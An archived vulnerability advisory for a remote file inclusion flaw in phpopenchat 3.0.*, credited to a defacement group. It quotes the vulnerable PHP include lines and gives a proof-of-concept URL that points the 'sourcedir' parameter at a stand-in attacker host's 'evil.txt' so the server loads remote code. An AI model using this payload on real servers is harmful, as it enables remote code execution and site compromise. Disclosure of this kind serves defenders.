TUCoPS :: Web :: PHP :: b06-4606.htm

phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit
WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit



[W]orld [D]efacers Team=0D
--------------------Summary----------------=0D
=0D
eVuln ID: WD23=0D
=0D
Vendor:  phpopenchat-3.0.*=0D
=0D
Vendor's Web Site: http://phpopenchat.org=0D 
=0D
Class: Remote=0D
=0D
PoC/Exploit: Available=0D
=0D
Solution: Not Available=0D
=0D
Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de )=0D
=0D
-----------------Description---------------=0D
=0D
include_once("QueryString.php");=0D
include_once("Settings.php");=0D
include_once("$sourcedir/Subs.php");=0D
include_once("$sourcedir/Errors.php");=0D
include_once("$sourcedir/Load.php");=0D
//include_once("$sourcedir/Security.php");=0D
=0D
--------------PoC/Exploit----------------------=0D
=0D
http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt?=0D 
=0D
--------------Solution---------------------=0D
=0D
No Patch available.=0D
=0D
--------------Credit-----------------------=0D
=0D
Discovered by: rUnViRuS (worlddefacers.de)=0D
=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH